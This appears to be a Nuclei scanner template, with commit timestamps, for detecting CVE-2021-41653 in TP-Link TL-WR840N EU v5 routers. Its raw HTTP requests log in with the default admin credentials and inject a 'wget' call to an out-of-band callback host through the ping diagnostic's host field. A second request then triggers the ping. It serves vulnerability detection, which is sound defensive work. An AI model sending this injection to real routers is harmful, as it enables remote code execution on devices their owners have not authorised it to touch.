2021-11-30 05:35:25 +00:00
id : CVE-2021-41653
info :
name : TP-Link - OS Command Injection
description : The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
author : gy741
severity : critical
reference :
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2021-41653
cwe-id : CWE-94
2021-11-30 16:52:16 +00:00
tags : cve,cve2021,tplink,rce,router
2021-11-30 05:35:25 +00:00
requests :
- raw :
- |
POST /cgi?2 HTTP/1.1
Host : {{Hostname}}
Content-Type : text/plain
Referer : http://{{Hostname}}/mainFrame.htm
Cookie : Authorization=Basic YWRtaW46YWRtaW4=
[ IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
host=$(echo 127.0.0.1; wget http://{{interactsh-url}})
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
2021-11-30 16:52:16 +00:00
- |
2021-11-30 05:35:25 +00:00
POST /cgi?7 HTTP/1.1
Host : {{Hostname}}
Content-Type : text/plain
Referer : http://{{Hostname}}/mainFrame.htm
Cookie : Authorization=Basic YWRtaW46YWRtaW4=
[ ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"